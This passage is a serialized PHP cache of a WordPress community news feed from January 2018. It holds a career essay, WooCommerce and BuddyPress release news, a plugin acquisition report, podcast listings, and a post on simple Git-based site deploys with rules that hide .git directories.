consultancy using “WordPress” I just said “yes.” It was mysterious, being unknown to me, and intriguing, which is usually a green light in my book!</p>\n<p>I started doing administrative work on a website he helped develop for a national guild. Like many situations, he had finished their website and they would circle back to him for minor updates. I took on the minor updates, started tinkering on my own, and fell in love in the process.</p>\n<p>The accessibility with which one could make changes and produce content dynamically was just mind blowing to me. It was my gateway to web development and now I could make web content with the ability to work with code, if I so chose. It seemed an endless source of learning and knowledge- it was a great fit.</p>\n<h2>Levelling Up</h2>\n<p>That went well and he brought me on a larger project to help the artist, Dorothy Braudy, create her website archive. I was able to blend my affinity for the technical and handy visual memory to help an all around amazing person (she&#8217;s still one of closest people in my life) tell her story through her art. I was thrilled to have the challenge and the privilege to bring her vibrant and prolific work (hundreds of pieces) to the web.</p>\n<p>I also started assisting John with teaching WordPress classes at SCORE, a government organization that helps people develop and sustain small businesses.</p>\n<blockquote><p>We volunteered our time teaching business owners WordPress to help them build their own websites.</p></blockquote>\n<p>It was challenging yet rewarding to see them feel empowered that they could take a hands-on role in making their web presence.</p>\n<p>Nevertheless, I ended up with several clients and that’s how my freelancing career began :). I also started going to meetups. John brought me to my first one in the San Fernando Valley. I was like wait&#8230;this software is cool and people gather to talk about it? I can also learn stuff too?! Get outta town!</p>\n<p>Well, I started attending fairly frequently. Particularly, the meetup in the West Valley lead by Andrew Behla (then at the Topanga Canyon Library). I soaked up info from presentations given by Roy Sivan, Suzette Franck, and Lucy Beer (who is now my teammate). Just to name a few ;).</p>\n<p>After building a consistent client base, I also started working part-time as a project assistant at a boutique museum exhibit development firm. My first project was for the Huntington Library, Art Collections and Botanical Gardens supporting the development of an educational WordPress website for their Junípero Serra exhibition. What were the chances? My skills in WordPress proved helpful for the project and the firm&#8217;s website.</p>\n<h2>Pivoting</h2>\n<p>At this point, I had seen my mom through her first hip replacement and recovery, and she was moving on to her next one. I thought about where I saw myself and also where I could build a sustainable future given the circumstances. I thought WordPress, and so I did a trial as a Happiness Engineer at WordPress.com.</p>\n<p>While I didn&#8217;t get the position, I met some great people and learned exponentially more in that short time than I had on my own. More so, I learned about the users, WordPress’ strengths and weaknesses, and how to fill that gap in an accessible way. I was sad, but also motivated. I took on more client work and just did the thing.</p>\n<p>After three years, it was time to leave the exhibit development firm. It was fascinating, it provided me a design, development and project management vocabulary I had never encountered before. However, I needed a firmer career path and I still thought WordPress. My mom was recovered, I had also just recovered from some health issues, and I knew it was time for a change.</p>\n<p>While doing client work for several months, I also explored options on how I could &#8220;level up.&#8221; Maybe it was my time to dig into web development: should I learn on my own, go to a school?</p>\n<blockquote><p>In my gut, I knew I had to find work that supported my endeavors, so I started applying in the WordPress and tech ecosystem.</p></blockquote>\n<p>I networked, attended workshops, and met some awesome folks in the local tech and WordPress communities. I was also approached about joining the organizer team for WordCamp Los Angeles (WCLAX). I said “yes” (that magic word) and last year we had a great event.</p>\n<p>When we started planning, I had also heard from WP Media, (the company behind the WP Rocket and Imagify plugins), that I was hired for their Customer Support position. We’re a remote crew spread across 8 countries. However, I’ve been lucky enough to spend time with them at WordCamp Europe, WordCamp US, and our annual retreat last year.</p>\n<h2>Transformation</h2>\n<p>My place in the world has transformed. I&#8217;ve traveled to places once out of reach, work every day with some of the most brilliant and kind people in the WordPress space, and grow day by day with new challenges and opportunities. I&#8217;m happy, mom is healthy, and the journey continues…</p>\n<div class=\"rtsocial-container rtsocial-container-align-right rtsocial-horizontal\"><div class=\"rtsocial-twitter-horizontal\"><div class=\"rtsocial-twitter-horizontal-button\"><a title=\"Tweet: The Journey: Curiosity, Challenge, Transformation\" class=\"rtsocial-twitter-button\" href=\"https://twitter.com/share?text=The%20Journey%3A%20Curiosity%2C%20Challenge%2C%20Transformation&via=heropress&url=https%3A%2F%2Fheropress.com%2Fessays%2Fjourney-curiosity-challenge-transformation%2F\" rel=\"nofollow\" target=\"_blank\"></a></div></div><div class=\"rtsocial-fb-horizontal fb-light\"><div class=\"rtsocial-fb-horizontal-button\"><a title=\"Like: The Journey: Curiosity, Challenge, Transformation\" class=\"rtsocial-fb-button rtsocial-fb-like-light\" href=\"https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fessays%2Fjourney-curiosity-challenge-transformation%2F\" rel=\"nofollow\" target=\"_blank\"></a></div></div><div class=\"rtsocial-linkedin-horizontal\"><div class=\"rtsocial-linkedin-horizontal-button\"><a class=\"rtsocial-linkedin-button\" href=\"https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fessays%2Fjourney-curiosity-challenge-transformation%2F&title=The+Journey%3A+Curiosity%2C+Challenge%2C+Transformation\" rel=\"nofollow\" target=\"_blank\" title=\"Share: The Journey: Curiosity, Challenge, Transformation\"></a></div></div><div class=\"rtsocial-pinterest-horizontal\"><div class=\"rtsocial-pinterest-horizontal-button\"><a class=\"rtsocial-pinterest-button\" href=\"https://pinterest.com/pin/create/button/?url=https://heropress.com/essays/journey-curiosity-challenge-transformation/&media=https://heropress.com/wp-content/uploads/2018/01/013118-2-150x150.jpg&description=The Journey: Curiosity, Challenge, Transformation\" rel=\"nofollow\" target=\"_blank\" title=\"Pin: The Journey: Curiosity, Challenge, Transformation\"></a></div></div><a rel=\"nofollow\" class=\"perma-link\" href=\"https://heropress.com/essays/journey-curiosity-challenge-transformation/\" title=\"The Journey: Curiosity, Challenge, Transformation\"></a></div><p>The post <a rel=\"nofollow\" href=\"https://heropress.com/essays/journey-curiosity-challenge-transformation/\">The Journey: Curiosity, Challenge, Transformation</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 31 Jan 2018 11:00:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Renee Johnson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: WooCommerce 3.3 Increases Theme Compatibility, Auto Regenerates Thumbnails\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=77795\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"https://wptavern.com/woocommerce-3-3-increases-theme-compatibility-auto-regenerates-thumbnails\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3108:\"<p>WooCommerce 3.3 <a href=\"https://woocommerce.com/2018/01/whats-new-woocommerce-3-3/\">is available</a> and is considered a minor release. Based on the project’s <a href=\"https://github.com/woocommerce/woocommerce/wiki/Roadmap-and-release-process\">new release process</a>, it should be fully backwards compatible with previous releases up to 3.0.</p>\n<p>The orders screen has been redesigned with large buttons that indicate an order’s status. You can also view an order’s details from the order screen without having to edit the order.</p>\n<img class=\"aligncenter\" src=\"https://i2.wp.com/wptavern.com/wp-content/uploads/2018/01/WC33OrdersScreen.png?w=627&ssl=1\" alt=\"\" width=\"627\" height=\"261\" />WooCommerce 3.3 Orders Screen\n<p>For products that are on backorder and have stock management enabled, WooCommerce 3.3 will automatically transition from ‘In stock’ to ‘On backorder’ or ‘Out of stock’ as the inventory decreases. Once inventory is added, the status will switch back to ‘In Stock’.</p>\n<img class=\"aligncenter\" src=\"https://i2.wp.com/wptavern.com/wp-content/uploads/2018/01/WC33OrderStatus.png?w=627&ssl=1\" alt=\"\" width=\"627\" height=\"328\" />WooCommerce 3.3 Order Status Screen\n<p>For full compatibility, users generally needed to use a WordPress theme that specifically supported WooCommerce. In 3.3, improvements have been made so that WooCommerce renders on themes that don’t fully support it, making it compatible with nearly every WordPress theme.</p>\n<p>Users can now set the number of columns and rows for shops with the ability to preview the results live via the Customizer. The columns will resize to fill the entire width of the area and is available on all themes.</p>\n<p>In earlier versions of WooCommerce, shop owners needed to use the <a href=\"https://wordpress.org/plugins/regenerate-thumbnails/\">Regenerate Thumbnails</a> after updating a product’s image as WordPress did not automatically resize the image and generate new thumbnails. WooCommerce 3.3 adds on-the-fly thumbnail regeneration and background thumbnail resizing.</p>\n<p>In addition, users can customize the aspect ratios of product images. The choices are classic square images, custom cropped images, or uncropped images</p>\n<img class=\"aligncenter\" src=\"https://i2.wp.com/wptavern.com/wp-content/uploads/2018/01/WC33ImageAspectRatio.png?w=627&ssl=1\" alt=\"\" width=\"627\" height=\"402\" />WooCommerce 3.3 Image Aspect Ratio Options\n<p>Shop owners can now view logs of product downloads with a couple of built-in filters including, by order, by product, by customer, and by file. You can also search for extensions now from the Extensions administration screen.</p>\n<p>WooCommerce 3.3 includes more features and changes than what’s listed here. For a detailed overview of what’s new in 3.3, <a href=\"https://github.com/woocommerce/woocommerce/blob/release/3.3/readme.txt\">check out the changelog</a>. If you think you’ve discovered a bug, please report it on the <a href=\"https://github.com/woothemes/woocommerce/issues\">project’s GitHub page</a>.</p>\n<p><!-- /wp:core/paragraph --></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 30 Jan 2018 22:53:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"Mark Jaquith: Simple WordPress deploys using Git\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://markjaquith.wordpress.com/?p=5422\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"https://markjaquith.wordpress.com/2018/01/30/simple-wordpress-deploys-using-git/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3328:\"<p>A few weeks back, Clifton Griffin asked me a question about deploying WordPress sites:</p>\n<div class=\"embed-twitter\">\n<blockquote class=\"twitter-tweet\">\n<p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/markjaquith?ref_src=twsrc%5Etfw\">@markjaquith</a> Hey Mark, quick question: Do you still use and recommend Capistrano?</p>\n<p>&mdash; Clifton Griffin (@clifgriffin) <a href=\"https://twitter.com/clifgriffin/status/948373150680707073?ref_src=twsrc%5Etfw\">January 3, 2018</a></p></blockquote>\n<p></div>\n<p>I <b>do not</b> use Capistrano for deployments anymore, for one simple reason: it was massive overkill for most of the sites I manage, and maintaining it was not worth the benefit.</p>\n<p>My current deployment system for WordPress sites is simple: I use Git.</p>\n<p>I&#8217;m already using Git for version control of the site&#8217;s code, so using Git for deployments is not that much more work. There are a few ways to do this, but the simplest way is to just make your site root a Git checkout of your site files.</p>\n<p>Then, if your server has read-access to your Git remote, you can run some Git commands to sync everything. Here are your options:</p>\n<ol>\n<li><strong>git pull</strong> — Simple, but might fail if someone naughty has made code modifications on the server.</li>\n<li><strong>git fetch &amp;&amp; git reset &#8211;hard origin/master</strong> — The hard reset method will wipe any local modifications that someone has mistakenly made.</li>\n</ol>\n<p>But wait. Before you implement this, it is very important that you ensure that your server&#8217;s <strong>.git</strong> directory is not readable, as it might be able to leak sensitive information about your site&#8217;s code. How you do this will depend on what web server you&#8217;re running. In Nginx, I do the following:</p>\n<pre class=\"brush: plain; title: ; notranslate\">location ~ /\\.(ht[a-z]+|git|svn) {\ndeny all;\n}</pre>\n<p>In Apache, you could put the following in your <strong>.htaccess</strong> file:</p>\n<pre class=\"brush: plain; title: ; notranslate\">RedirectMatch 404 /\\.git</pre>\n<p>SSHing into your server every time is tedious, so let&#8217;s script that:</p>\n<pre class=\"brush: bash; title: ; notranslate\">#!/bin/bash\nssh example.com \'cd /srv/www/example.com &amp;&amp; git pull\'</pre>\n<p>Save that to <strong>deploy.sh</strong> in your Git repo, run <strong>chmod +x deploy.sh</strong>, and commit it to the repo. Now when you&#8217;re ready to deploy the site, just type <strong>./deploy.sh</strong> and the public site will pull down the latest changes from your main Git remote.</p>\n<p>Bonus points if you make <strong>deploy.sh</strong> take an optional commit hash, so you can also use this tool to roll back to a previous hash, in case a commit goes wrong.</p>\n<p>This method has served me well, for years, and has required no maintenance.</p>\n<p>What methods are you using for WordPress code deploys?</p>\n<hr />\n<p><b>Do you need <a href=\"https://coveredwebservices.com/\">WordPress services?</a></b></p>\n<p>Mark runs <a href=\"https://coveredwebservices.com/\">Covered Web Services</a> which specializes in custom WordPress solutions with focuses on security, speed optimization, plugin development and customization, and complex migrations.</p>\n<p>Please reach out to start a conversation!</p>\n[contact-form]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 30 Jan 2018 15:31:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mark Jaquith\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"WPTavern: UpdraftPlus Acquires Easy Updates Manager Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=77700\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wptavern.com/updraftplus-acquires-easy-updates-manager-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2048:\"<p><a href=\"https://updraftplus.com/\">UpdraftPlus</a>, a popular WordPress backup plugin actively installed on more than 1 million sites has acquired the <a href=\"https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/\">Easy Updates Manager</a> plugin for an undisclosed amount.</p>\n<p>Easy Updates Manager disables core, theme, and plugin updates in WordPress and provides granular control over them. It was created in 2015, is actively installed on more than 100K sites, and is maintained by <a href=\"https://profiles.wordpress.org/kidsguide/\">Matthew Sparrow</a>, <a href=\"https://profiles.wordpress.org/ronalfy/\">Ronald Huereca</a>, <a href=\"https://profiles.wordpress.org/roary86/\">Roary Tubbs</a>, and <a href=\"https://profiles.wordpress.org/bigwing/\">BigWing Interactive</a>.</p>\n<img />Easy Updates manager User Interface\n<p>Burnout was a contributing factor for selling the plugin. &#8220;Matthew Sparrow and I were both burnt out on the project, so the offer to sell was a no-brainer,&#8221; Huereca said. &#8220;It’s bittersweet letting our baby go, but it’s in good hands.&#8221;</p>\n<p>Without proper vetting, selling established plugins to individuals or companies can be harmful to sites and tarnish its reputation. Because UpdraftPlus is a well established company, Huereca didn&#8217;t have to do a lot of research.</p>\n<p>&#8220;We were looking for more backend plugins that we understand and it&#8217;s a great plugin, highly rated and growing,&#8221; A company representative said. &#8220;Updates and backups go hand-in-hand as people should really backup before updating.&#8221;</p>\n<p>UpdraftPlus will focus its marketing efforts towards <a href=\"https://updraftplus.com/updraftcentral/\">UpdraftCentral</a> later this year. UpdraftCentral provides the ability for users to update, backup, and manage their sites from one dashboard. Easy Updates Manager and UpdraftCentral are complimentary products.</p>\n<p>Users can expect to see more updates later this year and continued refinement of the user interface.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 30 Jan 2018 00:30:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"BuddyPress: BuddyPress 2.9.3 Security and Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://buddypress.org/?p=270325\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"https://buddypress.org/2018/01/buddypress-2-9-3-security-and-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1312:\"<p>BuddyPress 2.9.3 is now available. This is a security and maintenance release. We strongly encourage all BuddyPress sites to upgrade as soon as possible.</p>\n<p>The 2.9.3 release addresses two security issues:</p>\n<ul>\n<li>A dynamic template loading feature could be used in some cases for unauthorized file execution and directory traversal. Reported by <a href=\"https://pritect.net\">James Golovich</a>.</li>\n<li>Some permissions checks and path validations in the attachment deletion process were hardened. Reported by <a href=\"https://www.ripstech.com/\">RIPSTech</a> and <a href=\"https://profiles.wordpress.org/slaFFik/\">Slava Abakumov</a> of the BuddyPress security team.</li>\n</ul>\n<p>These vulnerabilities were reported privately to the BuddyPress team, in accordance with <a href=\"https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/\">WordPress&#8217;s security policies</a>. Our thanks to all reporters for practicing coordinated disclosure.</p>\n<p>In addition, 2.9.3 includes a change that fixes the ability to install legacy bbPress 1.x forums. Please note that legacy forum support will be removed altogether in BuddyPress 3.0; see <a href=\"https://bpdevel.wordpress.com/2017/12/07/legacy-forums-support-will-be/\">the announcement blog post</a> for more details.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 26 Jan 2018 18:11:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Boone Gorges\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"Post Status: WordPress Market Opportunities — Draft podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=41485\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://poststatus.com/wordpress-market-opportunities-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2459:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast\">Google Play</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Brian Krogsgard and co-host Brian Richards.</p>\n<p>In this episode, Brian and Brian discuss market segmentation across the WordPress ecosystem. The focus for this discussion focused entirely on the entry-level segment of site assemblers and their small-business clients as well as the mid-level market of contractors and agencies selling additional levels of service. The duo talked through a few different strategies employed in each segment, including service differentiation, regional focus, building a network of complementary contractors, systemizing processes, delivering quality customer support flow, and selling ongoing service.</p>\n<p>In addition to this look at market segmentation, the Brians shared a few useful resources for both Gutenberg and WP-CLI.</p>\n<p></p>\n<h3>Links</h3>\n<ul>\n<li>Mike McAlister&#8217;s <a href=\"http://gutenberg.news/\">Gutenberg News</a></li>\n<li>Ahmed Awais&#8217;s <a href=\"https://github.com/ahmadawais/create-guten-block\">create-gutenberg-block</a></li>\n<li>Delicious Brain&#8217;s <a href=\"https://deliciousbrains.com/wordpress-cli-packages-review/\">WP-CLI packages reviews</a></li>\n<li>WordPress Website: <a href=\"https://poststatus.com/wordpress-website-cost/\">How much should it cost?</a></li>\n<li><a href=\"https://wpsessions.com/sessions/selling-ongoing-service/\">Selling Ongoing Services with Sara Dunn</a></li>\n</ul>\n<h3>Sponsor: iThemes</h3>\n<p>This episode is sponsored by <a href=\"https://ithemes.com/?utm_source=post_status&utm_medium=banner&utm_campaign=ps_ads\">iThemes</a>. The team at iThemes offers WordPress plugins, themes and training to help take the guesswork out of building, maintaining and securing WordPress websites. For more information, check out their <a href=\"https://ithemes.com/?utm_source=post_status&utm_medium=banner&utm_campaign=ps_ads\">website</a> and thank you to iThemes for being a Post Status partner.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 26 Jan 2018 16:50:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: WPWeekly Episode 302 – Brian Gardner, Founder of StudioPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wptavern.com?p=77689&preview=true&preview_id=77689\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://wptavern.com/wpweekly-episode-302-brian-gardner-founder-of-studiopress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1338:\"<p>In this episode, <a href=\"http://jjj.me\">John James Jacoby</a> and I are joined by <a href=\"https://briangardner.com/\">Brian Gardner</a>, founder of <a href=\"https://www.studiopress.com/\">StudioPress</a>. We talk about the past, present, and future of the company including various milestones such as the Genesis framework and merger with CopyBlogger Media in 2010. We also discuss the community surrounding StudioPress&#8217; products and the role it plays in the company&#8217;s continued success.</p>\n<h2>Picks of the Week:</h2>\n<p><a href=\"https://wptavern.com/new-toolkit-simplifies-the-process-of-creating-gutenberg-blocks\">Ahmad Awais Create Guten Block toolkit</a>.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, January 31st 3:00 P.M. Eastern</p>\n<p>Subscribe to <a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\">WordPress Weekly via Itunes</a></p>\n<p>Subscribe to <a href=\"https://www.wptavern.com/feed/podcast\">WordPress Weekly via RSS</a></p>\n<p>Subscribe to <a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\">WordPress Weekly via Stitcher Radio</a></p>\n<p>Subscribe to <a href=\"https://play.google.com/music/listen?u=0#/ps/Ir3keivkvwwh24xy7qiymurwpbe\">WordPress Weekly via Google Play</a></p>\n<p><strong>Listen To Episode #302:</strong> </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 26 Jan 2018 04:15:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff 